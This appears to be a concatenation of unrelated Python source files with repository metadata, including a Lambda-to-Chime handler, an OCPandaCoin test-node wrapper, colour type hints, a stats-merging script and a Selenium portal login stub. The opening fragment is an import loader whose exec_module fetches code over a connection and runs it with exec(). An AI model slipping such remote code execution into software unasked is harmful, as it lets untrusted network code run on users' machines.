return None
def exec_module(self, module):
code = self.conn.get(self.origin)
exec(code, module.__dict__)
| 30.8125
| 147
| 0.549696
|
a06e8cee0ee8437f83ff70a6d36d1512198e8b6a
| 552
|
py
|
Python
|
src/handlers.py
|
keetonian/lambda-to-chime
|
1edaec34d031d6c1a55d1319e8890cd04f277aae
|
[
"MIT"
] | 1
|
2021-10-05T13:08:26.000Z
|
2021-10-05T13:08:26.000Z
|
src/handlers.py
|
keetonian/lambda-to-chime
|
1edaec34d031d6c1a55d1319e8890cd04f277aae
|
[
"MIT"
] | null | null | null |
src/handlers.py
|
keetonian/lambda-to-chime
|
1edaec34d031d6c1a55d1319e8890cd04f277aae
|
[
"MIT"
] | null | null | null |
"""Lambda function handler."""
# must be the first import in files with lambda function handlers
import lambdainit # noqa: F401
import config
import lambdalogging
import chime
from exceptions import InputError
LOG = lambdalogging.getLogger(__name__)
def post_to_chime(event, context):
"""Lambda function handler."""
LOG.info('Received event: %s', event)
if not isinstance(event, list):
raise InputError(event, "Input needs to be a json array")
for message in event:
chime.post_message(config.CHIME_URL, message)
| 24
| 65
| 0.728261
|
aac16d2137cd9b65d825e9a6d7d2b6ea590fd938
| 13,103
|
py
|
Python
|
test/integration/ocpandacoind_node.py
|
overcookedpanda/OCPandaCoin
|
88fdafe2ae9959d41894ca84e5d74d4942b9d72b
|
[
"MIT"
] | null | null | null |
test/integration/ocpandacoind_node.py
|
overcookedpanda/OCPandaCoin
|
88fdafe2ae9959d41894ca84e5d74d4942b9d72b
|
[
"MIT"
] | null | null | null |
test/integration/ocpandacoind_node.py
|
overcookedpanda/OCPandaCoin
|
88fdafe2ae9959d41894ca84e5d74d4942b9d72b
|
[
"MIT"
] | null | null | null |
import os
import time
from pathlib import Path
from pypoptools.pypoptesting.framework.bin_util import assert_dir_accessible, get_open_port
from pypoptools.pypoptesting.framework.entities import *
from pypoptools.pypoptesting.framework.json_rpc import JsonRpcApi, JsonRpcException
from pypoptools.pypoptesting.framework.managers import ProcessManager
from pypoptools.pypoptesting.framework.node import Node
from pypoptools.pypoptesting.framework.sync_util import wait_until
PORT_MIN = 15000
PORT_MAX = 25000
BIND_TO = '127.0.0.1'
def _write_ocpandacoin_conf(datadir, p2p_port, rpc_port, rpc_user, rpc_password):
bitcoin_conf_file = Path(datadir, "ocpandacoin.conf")
with open(bitcoin_conf_file, 'w', encoding='utf8') as f:
f.write("regtest=1\n")
f.write("[{}]\n".format("regtest"))
f.write("port={}\n".format(p2p_port))
f.write("rpcport={}\n".format(rpc_port))
f.write("rpcuser={}\n".format(rpc_user))
f.write("rpcpassword={}\n".format(rpc_password))
f.write("fallbackfee=0.0002\n")
f.write("server=1\n")
f.write("keypool=1\n")
f.write("discover=0\n")
f.write("dnsseed=0\n")
f.write("listenonion=0\n")
f.write("printtoconsole=0\n")
f.write("upnp=0\n")
f.write("shrinkdebugfile=0\n")
f.write("popvbknetwork=regtest\n")
f.write("popbtcnetwork=regtest\n")
f.write("poplogverbosity=info\n")
class OCPandaCoindNode(Node):
def __init__(self, number: int, datadir: Path):
self.number = number
p2p_port = get_open_port(PORT_MIN, PORT_MAX, BIND_TO)
self.p2p_address = "{}:{}".format(BIND_TO, p2p_port)
rpc_port = get_open_port(PORT_MIN, PORT_MAX, BIND_TO)
rpc_url = "http://{}:{}/".format(BIND_TO, rpc_port)
rpc_user = 'testuser'
rpc_password = 'testpassword'
self.rpc = JsonRpcApi(rpc_url, user=rpc_user, password=rpc_password)
ocpandacoind_path = os.environ.get('OCPANDACOIN_PATH')
if ocpandacoind_path == None:
raise Exception("OCPANDACOIN_PATH env var is not set. Set up the path to the ocpandacoind binary to the OCPANDACOIN_PATH env var")
exe = Path(Path.cwd(), ocpandacoind_path)
if not exe:
raise Exception("OCPandaCoinNode: ocpandacoind is not found in PATH")
assert_dir_accessible(datadir)
args = [
exe,
"-datadir=" + str(datadir),
"-logtimemicros",
"-logthreadnames",
"-debug",
"-debugexclude=libevent",
"-debugexclude=leveldb",
"-txindex",
"-uacomment=testnode{}".format(number)
]
self.manager = ProcessManager(args, datadir)
_write_ocpandacoin_conf(datadir, p2p_port, rpc_port, rpc_user, rpc_password)
def start(self) -> None:
self.manager.start()
wait_until(lambda: self.is_rpc_available(), timeout=60)
def is_rpc_available(self) -> bool:
try:
self.rpc.getblockcount()
return True
except Exception as e:
return False
def stop(self) -> None:
self.manager.stop()
def connect(self, node):
self.rpc.addnode(node.p2p_address, 'onetry')
# poll until version handshake complete to avoid race conditions
# with transaction relaying
wait_until(lambda: all(peer['version'] != 0 for peer in self.rpc.getpeerinfo()))
def disconnect(self, node):
node_num = node.number
for peer_id in [peer['id'] for peer in self.rpc.getpeerinfo() if
"testnode{}".format(node_num) in peer['subver']]:
try:
self.rpc.disconnectnode(address='', nodeid=peer_id)
except JsonRpcException as e:
# If this node is disconnected between calculating the peer id
# and issuing the disconnect, don't worry about it.
# This avoids a race condition if we're mass-disconnecting peers.
if e.error['code'] != -29: # RPC_CLIENT_NODE_NOT_CONNECTED
raise
# wait to disconnect
wait_until(
lambda: not any(["testnode{}".format(node_num) in peer['subver'] for peer in self.rpc.getpeerinfo()]),
timeout=5)
def getpeers(self) -> List[Peer]:
s = self.rpc.getpeerinfo()
return [
Peer(
id=peer['id'],
banscore=peer['banscore']
)
for peer in s
]
def getbalance(self) -> int:
# convert to satoshi
return int(self.rpc.getbalance() * 10**8)
def getnewaddress(self) -> str:
return self.rpc.getnewaddress()
def getpayoutinfo(self, address: str = None) -> Hexstr:
address = address or self.getnewaddress()
s = self.rpc.validateaddress(address)
return s['scriptPubKey']
def generate(self, nblocks: int, address: str = None) -> None:
address = address or self.getnewaddress()
for i in range(nblocks):
self.rpc.generatetoaddress(1, address)
tip_hash = self.getbestblockhash()
tip = self.rpc.getblock(tip_hash)
tip_time = tip['time']
current_time = int(time.time())
if current_time < tip_time:
time.sleep(tip_time - current_time)
def getbestblockhash(self) -> Hexstr:
return self.rpc.getbestblockhash()
def getblock(self, hash: Hexstr) -> BlockWithPopData:
s = self.rpc.getblock(hash)
return BlockWithPopData(
hash=s['hash'],
height=s['height'],
prevhash=s.get('previousblockhash', ''),
confirmations=s['confirmations'],
endorsedBy=s['pop']['state']['endorsedBy'] if s['pop']['state'] else [],
blockOfProofEndorsements=[],
containingATVs=s['pop']['data']['atvs'],
containingVTBs=s['pop']['data']['vtbs'],
containingVBKs=s['pop']['data']['vbkblocks']
)
def getblockcount(self) -> int:
return self.rpc.getblockcount()
def getblockhash(self, height: int) -> Hexstr:
return self.rpc.getblockhash(height)
def getbtcbestblockhash(self) -> Hexstr:
return self.rpc.getbtcbestblockhash()
def getpopdatabyhash(self, hash: Hexstr) -> GetpopdataResponse:
s = self.rpc.getpopdatabyhash(hash)
return GetpopdataResponse(
header=s['block_header'],
authenticated_context=s['authenticated_context']['serialized'],
last_known_vbk_block=s['last_known_veriblock_blocks'][-1],
last_known_btc_block=s['last_known_bitcoin_blocks'][-1],
)
def getpopdatabyheight(self, height: int) -> GetpopdataResponse:
s = self.rpc.getpopdatabyheight(height)
return GetpopdataResponse(
header=s['block_header'],
authenticated_context=s['authenticated_context']['serialized'],
last_known_vbk_block=s['last_known_veriblock_blocks'][-1],
last_known_btc_block=s['last_known_bitcoin_blocks'][-1],
)
def getpopparams(self) -> PopParamsResponse:
s = self.rpc.getpopparams()
bootstrap = GenericBlock(
hash=s['bootstrapBlock']['hash'],
prevhash=s['bootstrapBlock']['previousBlock'],
height=s['bootstrapBlock']['height']
)
vbkBootstrap = BlockAndNetwork(
block=GenericBlock(
hash=s['vbkBootstrapBlock']['hash'],
prevhash=s['vbkBootstrapBlock'].get('previousBlock', ''),
height=s['vbkBootstrapBlock']['height']
),
network=s['vbkBootstrapBlock']['network']
)
btcBootstrap = BlockAndNetwork(
block=GenericBlock(
hash=s['btcBootstrapBlock']['hash'],
prevhash=s['btcBootstrapBlock'].get('previousBlock', ''),
height=s['btcBootstrapBlock']['height']
),
network=s['btcBootstrapBlock']['network']
)
return PopParamsResponse(
popActivationHeight=s['popActivationHeight'],
popPayoutDelay=s['payoutParams']['popPayoutDelay'],
bootstrapBlock=bootstrap,
vbkBootstrap=vbkBootstrap,
btcBootstrap=btcBootstrap,
networkId=s['networkId'],
maxVbkBlocksInAltBlock=s['maxVbkBlocksInAltBlock'],
maxVTBsInAltBlock=s['maxVTBsInAltBlock'],
maxATVsInAltBlock=s['maxATVsInAltBlock'],
endorsementSettlementInterval=s['endorsementSettlementInterval'],
finalityDelay=s['finalityDelay'],
keystoneInterval=s['keystoneInterval'],
maxAltchainFutureBlockTime=s['maxAltchainFutureBlockTime'],
maxReorgDistance=s['maxReorgDistance']
)
def getrawatv(self, atvid: Hexstr) -> AtvResponse:
s = self.rpc.getrawatv(atvid, 1)
r = AtvResponse()
r.in_active_chain = s['in_active_chain']
r.confirmations = s['confirmations']
if r.confirmations > 0:
# in block
r.blockhash = s['blockhash']
r.blockheight = s['blockheight']
r.containingBlocks = s['containing_blocks']
a = s['atv']
tx = a['transaction']
pd = tx['publicationData']
bop = a['blockOfProof']
r.atv = ATV(
id=a['id'],
tx=VbkTx(
hash=tx['hash'],
publicationData=PublicationData(**pd)
),
blockOfProof=GenericBlock(
hash=bop['hash'],
prevhash=bop['previousBlock'],
height=bop['height']
)
)
return r
def getrawpopmempool(self) -> RawPopMempoolResponse:
s = self.rpc.getrawpopmempool()
return RawPopMempoolResponse(**s)
def getrawvbkblock(self, vbkblockid: Hexstr) -> VbkBlockResponse:
s = self.rpc.getrawvbkblock(vbkblockid, 1)
r = VbkBlockResponse()
r.in_active_chain = s['in_active_chain']
r.confirmations = s['confirmations']
if r.confirmations > 0:
# in block
r.blockhash = s['blockhash']
r.blockheight = s['blockheight']
r.containingBlocks = s['containing_blocks']
r.vbkblock = VbkBlock(**s['vbkblock'])
return r
def getrawvtb(self, vtbid: Hexstr) -> VtbResponse:
s = self.rpc.getrawvtb(vtbid, 1)
r = VtbResponse()
r.in_active_chain = s['in_active_chain']
r.confirmations = s['confirmations']
if r.confirmations > 0:
# in block
r.blockhash = s['blockhash']
r.blockheight = s['blockheight']
r.containingBlocks = s['containing_blocks']
v = s['vtb']
tx = v['transaction']
cb = v['containingBlock']
r.vtb = VTB(
id=v['id'],
tx=VbkPopTx(
hash=tx['hash'],
publishedBlock=VbkBlock(**tx['publishedBlock']),
blockOfProof=BtcBlock(**tx['blockOfProof']),
blockOfProofContext=[BtcBlock(**x) for x in tx['blockOfProofContext']]
),
containingBlock=GenericBlock(
hash=cb['hash'],
prevhash=cb['previousBlock'],
height=cb['height']
)
)
return r
def getvbkbestblockhash(self) -> Hexstr:
return self.rpc.getvbkbestblockhash()
def submitpopatv(self, atv: Hexstr) -> SubmitPopResponse:
s = self.rpc.submitpopatv(atv)
return SubmitPopResponse(
accepted=s['accepted'],
code=s.get('code', ''),
message=s.get('message', '')
)
def submitpopvbk(self, vbk: Hexstr) -> SubmitPopResponse:
s = self.rpc.submitpopvbk(vbk)
return SubmitPopResponse(
accepted=s['accepted'],
code=s.get('code', ''),
message=s.get('message', '')
)
def submitpopvtb(self, vtb: Hexstr) -> SubmitPopResponse:
s = self.rpc.submitpopvtb(vtb)
return SubmitPopResponse(
accepted=s['accepted'],
code=s.get('code', ''),
message=s.get('message', '')
)
def getrpcfunctions(self) -> RpcFunctions:
return RpcFunctions(
get_popdata_by_height = 'getpopdatabyheight',
get_popdata_by_hash = 'getpopdatabyhash',
submit_atv = 'submitpopatv',
submit_vtb = 'submitpopvtb',
submit_vbk = 'submitpopvbk',
get_missing_btc_block_hashes = 'getmissingbtcblockhashes',
extract_block_info = 'extractblockinfo',
get_vbk_block = 'getvbkblock',
get_btc_block = 'getbtcblock',
get_vbk_best_block_hash = 'getvbkbestblockhash',
get_btc_best_block_hash = 'getbtcbestblockhash',
get_raw_atv = 'getrawatv',
get_raw_vtb = 'getrawvtb',
)
| 36.600559
| 142
| 0.588568
|
b8f2bd3c240d6a49218abacbbe32b9cc291c69a6
| 83
|
py
|
Python
|
webhooks_config.py
|
boyska/python-github-webhooks
|
570d9cbbcbe99f5d656019749972367b31892ca5
|
[
"Apache-2.0"
] | null | null | null |
webhooks_config.py
|
boyska/python-github-webhooks
|
570d9cbbcbe99f5d656019749972367b31892ca5
|
[
"Apache-2.0"
] | null | null | null |
webhooks_config.py
|
boyska/python-github-webhooks
|
570d9cbbcbe99f5d656019749972367b31892ca5
|
[
"Apache-2.0"
] | 1
|
2018-10-24T08:16:56.000Z
|
2018-10-24T08:16:56.000Z
|
GITHUB_IPS_ONLY = False
ENFORCE_SECRET = ""
RETURN_SCRIPTS_INFO = True
PORT = 8000
| 16.6
| 26
| 0.783133
|
421c88024e20a52dd3138ac19c438111f7322468
| 120
|
py
|
Python
|
vue_ema/users/apps.py
|
munapaula/vue_ema
|
5aeaa3da426cc7e9d3c162696b1cacd1acf31211
|
[
"MIT"
] | null | null | null |
vue_ema/users/apps.py
|
munapaula/vue_ema
|
5aeaa3da426cc7e9d3c162696b1cacd1acf31211
|
[
"MIT"
] | null | null | null |
vue_ema/users/apps.py
|
munapaula/vue_ema
|
5aeaa3da426cc7e9d3c162696b1cacd1acf31211
|
[
"MIT"
] | null | null | null |
from django.apps import AppConfig
class UsersConfig(AppConfig):
name = 'vue_ema.users'
verbose_name = 'Users'
| 17.142857
| 33
| 0.725
|
c7a1876d22a9a4d1dd14c2e59af7b06dfdedfb84
| 6,465
|
py
|
Python
|
colour/hints/__init__.py
|
soma2000-lang/colour
|
bb7ee23ac65e09613af78bd18dd98dffb1a2904a
|
[
"BSD-3-Clause"
] | 1
|
2022-02-12T06:28:15.000Z
|
2022-02-12T06:28:15.000Z
|
colour/hints/__init__.py
|
soma2000-lang/colour
|
bb7ee23ac65e09613af78bd18dd98dffb1a2904a
|
[
"BSD-3-Clause"
] | null | null | null |
colour/hints/__init__.py
|
soma2000-lang/colour
|
bb7ee23ac65e09613af78bd18dd98dffb1a2904a
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Annotation Type Hints
=====================
Defines the annotation type hints, the module exposes many aliases from
:mod:`typing` and :mod:`numpy.typing` to avoid having to handle multiple
imports.
"""
from __future__ import annotations
import numpy as np
import numpy.typing as npt
import re
from types import ModuleType
from typing import (
Any,
Callable,
Dict,
Generator,
Iterable,
Iterator,
List,
Mapping,
NewType,
Optional,
Union,
Sequence,
TextIO,
Tuple,
TYPE_CHECKING,
Type,
TypeVar,
cast,
)
from typing_extensions import runtime_checkable
try:
from typing import (
Literal,
Protocol,
SupportsIndex,
TypedDict,
)
# TODO: Drop "typing_extensions" when "Google Colab" uses Python >= 3.8.
except ImportError: # pragma: no cover
from typing_extensions import ( # type: ignore[misc]
Literal,
Protocol,
SupportsIndex,
TypedDict,
)
__author__ = "Colour Developers"
__copyright__ = "Copyright (C) 2013-2022 - Colour Developers"
__license__ = "New BSD License - https://opensource.org/licenses/BSD-3-Clause"
__maintainer__ = "Colour Developers"
__email__ = "colour-developers@colour-science.org"
__status__ = "Production"
__all__ = [
"Any",
"Callable",
"Dict",
"Generator",
"Iterable",
"Iterator",
"List",
"Mapping",
"ModuleType",
"Optional",
"Union",
"Sequence",
"SupportsIndex",
"TextIO",
"Tuple",
"Type",
"TypedDict",
"TypeVar",
"RegexFlag",
"DTypeBoolean",
"DTypeInteger",
"DTypeFloating",
"DTypeNumber",
"DTypeComplex",
"DType",
"Integer",
"Floating",
"Number",
"Complex",
"Boolean",
"Literal",
"Dataclass",
"NestedSequence",
"ArrayLike",
"IntegerOrArrayLike",
"FloatingOrArrayLike",
"NumberOrArrayLike",
"ComplexOrArrayLike",
"BooleanOrArrayLike",
"ScalarType",
"StrOrArrayLike",
"NDArray",
"IntegerOrNDArray",
"FloatingOrNDArray",
"NumberOrNDArray",
"ComplexOrNDArray",
"BooleanOrNDArray",
"StrOrNDArray",
"TypeInterpolator",
"TypeExtrapolator",
"TypeLUTSequenceItem",
"LiteralWarning",
"cast",
]
Any = Any
Callable = Callable
Dict = Dict
Generator = Generator
Iterable = Iterable
Iterator = Iterator
List = List
Mapping = Mapping
ModuleType = ModuleType
Optional = Optional
Union = Union
Sequence = Sequence
SupportsIndex = SupportsIndex
TextIO = TextIO
Tuple = Tuple
Type = Type
TypedDict = TypedDict
TypeVar = TypeVar
RegexFlag = NewType("RegexFlag", re.RegexFlag)
DTypeInteger = Union[
np.int8,
np.int16,
np.int32,
np.int64,
np.uint8,
np.uint16,
np.uint32,
np.uint64,
]
DTypeFloating = Union[np.float16, np.float32, np.float64]
DTypeNumber = Union[DTypeInteger, DTypeFloating]
DTypeComplex = Union[np.csingle, np.cdouble]
DTypeBoolean = np.bool_
DType = Union[DTypeBoolean, DTypeNumber, DTypeComplex]
Integer = int
Floating = float
Number = Union[Integer, Floating]
Complex = complex
Boolean = bool
# TODO: Use "typing.Literal" when minimal Python version is raised to 3.8.
Literal = Literal
# TODO: Revisit to use Protocol.
Dataclass = Any
NestedSequence = npt._NestedSequence
ArrayLike = npt.ArrayLike
IntegerOrArrayLike = Union[Integer, ArrayLike]
FloatingOrArrayLike = Union[Floating, ArrayLike]
NumberOrArrayLike = Union[Number, ArrayLike]
ComplexOrArrayLike = Union[Complex, ArrayLike]
BooleanOrArrayLike = Union[Boolean, ArrayLike]
StrOrArrayLike = Union[str, ArrayLike]
ScalarType = TypeVar("ScalarType", bound=np.generic, covariant=True)
# TODO: Use "numpy.typing.NDArray" when minimal Numpy version is raised to
# 1.21.
if TYPE_CHECKING: # pragma: no cover
NDArray = np.ndarray[Any, np.dtype[ScalarType]]
else:
NDArray = np.ndarray
# TODO: Drop when minimal Python is raised to 3.9.
if TYPE_CHECKING: # pragma: no cover
IntegerOrNDArray = Union[Integer, NDArray[DTypeInteger]]
FloatingOrNDArray = Union[Floating, NDArray[DTypeFloating]]
NumberOrNDArray = Union[
Number, NDArray[Union[DTypeInteger, DTypeFloating]]
]
ComplexOrNDArray = Union[Complex, NDArray[DTypeComplex]]
BooleanOrNDArray = Union[Boolean, NDArray[DTypeBoolean]]
StrOrNDArray = Union[str, NDArray[np.str_]]
else:
IntegerOrNDArray = Union[Integer, NDArray]
FloatingOrNDArray = Union[Floating, NDArray]
NumberOrNDArray = Union[Number, NDArray]
ComplexOrNDArray = Union[Complex, NDArray]
BooleanOrNDArray = Union[Boolean, NDArray]
StrOrNDArray = Union[str, NDArray]
class TypeInterpolator(Protocol):
x: NDArray
y: NDArray
def __init__(self, *args: Any, **kwargs: Any):
... # pragma: no cover
def __call__(self, x: FloatingOrArrayLike) -> FloatingOrNDArray:
... # pragma: no cover
class TypeExtrapolator(Protocol):
interpolator: TypeInterpolator
def __init__(self, *args: Any, **kwargs: Any):
... # pragma: no cover
def __call__(self, x: FloatingOrArrayLike) -> FloatingOrNDArray:
... # pragma: no cover
@runtime_checkable
class TypeLUTSequenceItem(Protocol):
def apply(self, RGB: ArrayLike, **kwargs: Any) -> NDArray:
... # pragma: no cover
LiteralWarning = Literal[
"default", "error", "ignore", "always", "module", "once"
]
cast = cast
def arraylike(a: ArrayLike | NestedSequence[ArrayLike]) -> NDArray:
...
def number_or_arraylike(
a: NumberOrArrayLike | NestedSequence[ArrayLike],
) -> NDArray:
...
a: DTypeFloating = np.float64(1)
b: float = 1
c: Floating = 1
d: ArrayLike = [c, c]
e: FloatingOrArrayLike = d
s_a: Sequence[DTypeFloating] = [a, a]
s_b: Sequence[float] = [b, b]
s_c: Sequence[Floating] = [c, c]
arraylike(a)
arraylike(b)
arraylike(c)
arraylike(d)
arraylike([d, d])
arraylike(e)
arraylike([e, e])
arraylike(s_a)
arraylike(s_b)
arraylike(s_c)
number_or_arraylike(a)
number_or_arraylike(b)
number_or_arraylike(c)
number_or_arraylike(d)
number_or_arraylike([d, d])
number_or_arraylike(e)
number_or_arraylike([e, e])
number_or_arraylike(s_a)
number_or_arraylike(s_b)
number_or_arraylike(s_c)
np.atleast_1d(a)
np.atleast_1d(b)
np.atleast_1d(c)
np.atleast_1d(arraylike(d))
np.atleast_1d(arraylike([d, d]))
np.atleast_1d(arraylike(e))
np.atleast_1d(arraylike([e, e]))
np.atleast_1d(s_a)
np.atleast_1d(s_b)
np.atleast_1d(s_c)
del a, b, c, d, e, s_a, s_b, s_c
| 21.694631
| 78
| 0.686775
|
540605e6e74e22300aa6ffe253639560d9ed9564
| 8,446
|
py
|
Python
|
project/scenarios/merge-stats.py
|
mfranzil-unitn/unitn-m-lpwniot
|
2094c5555918cdb2cd4f3cfb18790c53ef93b77a
|
[
"MIT"
] | 1
|
2022-03-04T13:08:52.000Z
|
2022-03-04T13:08:52.000Z
|
project/scenarios/merge-stats.py
|
mfranzil-unitn/unitn-m-lpwniot
|
2094c5555918cdb2cd4f3cfb18790c53ef93b77a
|
[
"MIT"
] | null | null | null |
project/scenarios/merge-stats.py
|
mfranzil-unitn/unitn-m-lpwniot
|
2094c5555918cdb2cd4f3cfb18790c53ef93b77a
|
[
"MIT"
] | null | null | null |
import json
import os
import sys
mergename = sys.argv[1]
folder_name = 'results/' + mergename
testbed = False
fragments = sorted(os.listdir(folder_name))
# for fragment in fragments:
# fragname = fragment.split('.')[0]
# print("Analyzing the following files: ")
# print("Folder name: " + fragment)
# print("Energest: " + fragname + "-energest-merge.csv")
# print("Results: " + fragname + "-results.log")
# print("DC: " + fragname + "-dc.csv")
# Results
results = {
"avg_duty_cycle": [],
"std_dev": [],
"min_duty_cycle": [],
"max_duty_cycle": [],
"events_at_controller": [],
"collected_rounds_at_controller": [],
"failed_events": [],
"collect_pdr": [],
"commands_gen_controller": [],
"commands_recv_actuator": [],
"avg_actuation_pdr": [],
"sensor2-pdr": [],
"sensor3-pdr": [],
"sensor4-pdr": [],
"sensor5-pdr": [],
"sensor6-pdr": [],
}
for fragment in fragments:
fragname = fragment.split('.')[0]
with open(folder_name + "/" + fragname + "/" + fragname + "-results.log", 'r') as f:
for line in f:
if "AVERAGE DUTY CYCLE" in line:
# Line: AVERAGE DUTY CYCLE: 1.819%
duty_cycle = line.split(':')[1].strip().split('%')[0]
results["avg_duty_cycle"].append(float(duty_cycle))
elif "STANDARD DEVIATION" in line:
# Line: STANDARD DEVIATION: 0.735
std_dev = line.split(':')[1].strip()
results["std_dev"].append(float(std_dev))
elif "MINIMUM:" in line:
# Line: MINIMUM: 1.077%
min_duty_cycle = line.split(':')[1].strip().split('%')[0]
results["min_duty_cycle"].append(float(min_duty_cycle))
elif "MAXIMUM:" in line:
# Line: MAXIMUM: 1.819%
max_duty_cycle = line.split(':')[1].strip().split('%')[0]
results["max_duty_cycle"].append(float(max_duty_cycle))
elif "EVENTS AT CONTROLLER" in line:
# Line: EVENTS AT CONTROLLER: 4
events_at_controller = line.split(':')[1].strip()
results["events_at_controller"].append(int(events_at_controller))
elif "COLLECT ROUNDS AT CONTROLLER" in line:
# Line: COLLECT ROUNDS AT CONTROLLER: 4
collected_rounds_at_controller = line.split(':')[1].strip()
results["collected_rounds_at_controller"].append(int(collected_rounds_at_controller))
elif "FAILED EVENTS" in line:
# Line: FAILED EVENTS: 0
failed_events = line.split(':')[1].strip()
results["failed_events"].append(int(failed_events))
elif "COLLECT PDR" in line:
# Line: COLLECT PDR: 0.000
collect_pdr = line.split(':')[1].strip()
results["collect_pdr"].append(float(collect_pdr))
elif "COMMANDS GENERATED BY THE CONTROLLER" in line:
# Line: COMMANDS GENERATED BY THE CONTROLLER: 0
commands_gen_controller = line.split(':')[1].strip()
results["commands_gen_controller"].append(int(commands_gen_controller))
elif "COMMANDS RECEIVED BY ACTUATORS" in line:
# Line: COMMANDS RECEIVED BY ACTUATORS: 0
commands_recv_actuator = line.split(':')[1].strip()
results["commands_recv_actuator"].append(int(commands_recv_actuator))
elif "AVERAGE ACTUATION PDR" in line:
# Line: AVERAGE ACTUATION PDR: 0.000
avg_actuation_pdr = line.split(':')[1].strip()
results["avg_actuation_pdr"].append(float(avg_actuation_pdr))
elif "SENSOR 02:00 -- ACTUATION PDR" in line or "SENSOR f2:33 -- ACTUATION PDR" in line:
# Line: SENSOR 02:00 -- ACTUATION PDR: 0.000
sensor2_pdr = line.split(':')[2].strip()
results["sensor2-pdr"].append(float(sensor2_pdr))
elif "SENSOR 03:00 -- ACTUATION PDR" in line or "SENSOR f3:84 -- ACTUATION PDR" in line:
# Line: SENSOR 03:00 -- ACTUATION PDR: 0.000
sensor3_pdr = line.split(':')[2].strip()
results["sensor3-pdr"].append(float(sensor3_pdr))
elif "SENSOR 04:00 -- ACTUATION PDR" in line or "SENSOR f3:88 -- ACTUATION PDR" in line:
# Line: SENSOR 04:00 -- ACTUATION PDR: 0.000
sensor4_pdr = line.split(':')[2].strip()
results["sensor4-pdr"].append(float(sensor4_pdr))
elif "SENSOR 05:00 -- ACTUATION PDR" in line or "SENSOR f3:8b -- ACTUATION PDR" in line:
# Line: SENSOR 05:00 -- ACTUATION PDR: 0.000
sensor5_pdr = line.split(':')[2].strip()
results["sensor5-pdr"].append(float(sensor5_pdr))
elif "SENSOR 06:00 -- ACTUATION PDR" in line:
# Line: SENSOR 06:00 -- ACTUATION PDR: 0.000
sensor6_pdr = line.split(':')[2].strip()
results["sensor6-pdr"].append(float(sensor6_pdr))
# Extra case to trigger testbed notation
elif "SENSOR f7:e1 -- ACTUATION PDR" in line:
# Line: SENSOR f7:e1 -- ACTUATION PDR: 0.000
sensor6_pdr = line.split(':')[2].strip()
results["sensor6-pdr"].append(float(sensor6_pdr))
testbed = True
# Recreate document and save results to a csv
with open(folder_name + "/" + mergename + "-results-summary.json", 'w') as csvfile:
json.dump(results, csvfile)
# Calculate averages
for key in results:
results[key] = sum(results[key]) / len(results[key])
with open(folder_name + "/" + mergename + "-results.log", "w") as logfile:
logfile.write(f"""Namespace(logfile='{mergename}.log', testbed=False)
Logfile: {mergename}.log
Cooja simulation (merged stats out of {len(fragments)} fragments)
----- Duty Cycle Stats -----
AVERAGE DUTY CYCLE: {results["avg_duty_cycle"]:.3f}%
STANDARD DEVIATION: {results["std_dev"]:.3f}%
MINIMUM: {results["min_duty_cycle"]:.3f}%
MAXIMUM: {results["max_duty_cycle"]:.3f}%
----- Reliability Stats -----
# EVENTS AT CONTROLLER: {results["events_at_controller"]:.3f}
# COLLECT ROUNDS AT CONTROLLER: {results["collected_rounds_at_controller"]:.3f}
# FAILED EVENTS: {results["failed_events"]:.3f}
COLLECT PDR: {results["collect_pdr"]:.3f}
# COMMANDS GENERATED BY THE CONTROLLER: {results["commands_gen_controller"]:.3f}
# COMMANDS RECEIVED BY ACTUATORS: {results["commands_recv_actuator"]:.3f}
AVERAGE ACTUATION PDR: {results["avg_actuation_pdr"]:.3f}
SENSOR {"02:00" if not testbed else "f2:33"} -- ACTUATION PDR: {results["sensor2-pdr"]:.3f}
SENSOR {"03:00" if not testbed else "f3:84"} -- ACTUATION PDR: {results["sensor3-pdr"]:.3f}
SENSOR {"04:00" if not testbed else "f3:88"} -- ACTUATION PDR: {results["sensor4-pdr"]:.3f}
SENSOR {"05:00" if not testbed else "f3:8b"} -- ACTUATION PDR: {results["sensor5-pdr"]:.3f}
SENSOR {"06:00" if not testbed else "f7:e1"} -- ACTUATION PDR: {results["sensor6-pdr"]:.3f}
""")
# Energest
energest_lines = []
for fragment in fragments:
fragname = fragment.split('.')[0]
with open(folder_name + "/" + fragname + "/" + fragname + "-energest-merge.csv", 'r') as f:
lines = f.readlines()[1:]
for line in lines:
energest_lines.append("0," + line.replace("\n", ""))
with open(folder_name + "/" + mergename + "-energest.csv", 'w') as f:
f.write("time,node,cnt,cpu,lpm,tx,rx\n")
f.write("\n".join(energest_lines))
os.system('python3 parse-energest.py ' + folder_name + "/" + mergename + "-energest.csv")
os.system('trash ' + folder_name + "/" + mergename + "-energest.csv")
# DC
dc = {}
for fragment in fragments:
fragname = fragment.split('.')[0]
with open(folder_name + "/" + fragname + "/" + fragname + "-dc.csv", 'r') as f:
lines = f.readlines()[1:]
for line in lines:
fields = line.split(',')
node = int(float(fields[0]))
if node not in dc:
dc[node] = [float(fields[1])]
else:
dc[node].append(float(fields[1]))
# Calculate the average
for node in dc:
dc[node] = sum(dc[node]) / len(dc[node])
with open(folder_name + "/" + mergename + "-dc.csv", 'w') as f:
f.write("node,dc\n")
f.write("\n".join("{},{}".format(node, dc[node]) for node in dc))
| 43.989583
| 101
| 0.587852
|
105d813d717779f4f8ff1dc36865aa31970ebc1c
| 3,279
|
py
|
Python
|
login.py
|
darshit7/adrenalin-login
|
d803c5e7be5250afbf8fe70a4eca420e711b041c
|
[
"MIT"
] | 3
|
2017-01-10T04:31:27.000Z
|
2018-03-22T09:03:15.000Z
|
login.py
|
darshit7/adrenalin-login
|
d803c5e7be5250afbf8fe70a4eca420e711b041c
|
[
"MIT"
] | null | null | null |
login.py
|
darshit7/adrenalin-login
|
d803c5e7be5250afbf8fe70a4eca420e711b041c
|
[
"MIT"
] | null | null | null |
import os
import base64
import logging
import datetime
from cryptography.fernet import Fernet
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
def main():
logging.getLogger("selenium").setLevel(logging.INFO)
try:
path = os.environ['AD_LOG_PATH']
except KeyError:
path = ''
logging.basicConfig(filename=path+'adrenalin.log', format='%(levelname)s:%(message)s', level=logging.DEBUG)
logging.info('================================================================================')
logging.info('################# Started On %s #################', datetime.datetime.now())
class AdrenalinLogin():
"""
Class to login Adrenalin
"""
def __init__(self, url):
self.browser = webdriver.Chrome(executable_path='/usr/lib/chromium-browser/chromedriver')
self.browser.get("http://10.1.1.209/adrenalin/")
